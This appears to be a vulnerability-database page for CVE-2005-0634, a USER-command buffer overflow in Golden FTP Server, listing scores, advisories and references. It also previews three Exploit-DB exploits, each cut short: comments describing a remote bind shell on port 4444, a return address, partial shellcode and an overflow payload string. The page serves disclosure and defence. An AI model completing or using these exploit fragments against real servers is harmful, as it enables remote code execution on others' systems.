CVE-2005-0634
published 2005-05-02CVE-2005-0634: Buffer overflow in Golden FTP Server 1.92 allows remote attackers to execute arbitrary code via a long USER command.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.21%
95.1th percentile
Buffer overflow in Golden FTP Server 1.92 allows remote attackers to execute arbitrary code via a long USER command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goldenftpserver | golden_ftp_server | — | — |
| kmint21_software | golden_ftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vvm3-r83f-jhgf: Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6576 [HIGH] CWE-787 GHSA-vvm3-r83f-jhgf: Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1
Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1.92 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long PASS command. NOTE: it was later reported that 4.70 is also affected. NOTE: the USER vector is already covered by CVE-2005-0634.
GHSA
GHSA-235q-j3xw-c5jw: Buffer overflow in Golden FTP Server 1
ghsa_unreviewed·2022-05-01
CVE-2005-0634 [HIGH] GHSA-235q-j3xw-c5jw: Buffer overflow in Golden FTP Server 1
Buffer overflow in Golden FTP Server 1.92 allows remote attackers to execute arbitrary code via a long USER command.
No detection rules found.
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
---
/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/
#include
#include
#include
#include
#include
#define RETADDR 0x77F510B0
char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x7
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
---
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan and metasploit
* Usage:exploit
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
---
/*
Golden FTP Server Pro remote stack BOF exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
risk : highly critical
vender status : no patch released , all targets are vuln
package : golden-ftp-server-pro 2.5.0.0 and prior
advisory : http://secunia.com/advisories/15156/
vender address : www.goldenftpserver.com
timeline :
28 Apr 2005 : Public Disclosure
29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
after running the exploit u need to restart the server after that
the server will be closed automatically then u will have a shell
on port 4444 . if u want to erase the crap just clean the GFTPpro.log
manually as mentioned in the advisory .
workaround : upgrade to newer version or use anothe
No writeups or analysis indexed.
http://retrogod.altervista.org/golden_heap.htmlhttp://secunia.com/advisories/23323http://www.securityfocus.com/archive/1/391987http://www.securityfocus.com/bid/12704http://www.vupen.com/english/advisories/2006/4936http://retrogod.altervista.org/golden_heap.htmlhttp://secunia.com/advisories/23323http://www.securityfocus.com/archive/1/391987http://www.securityfocus.com/bid/12704http://www.vupen.com/english/advisories/2006/4936
2005-05-02
Published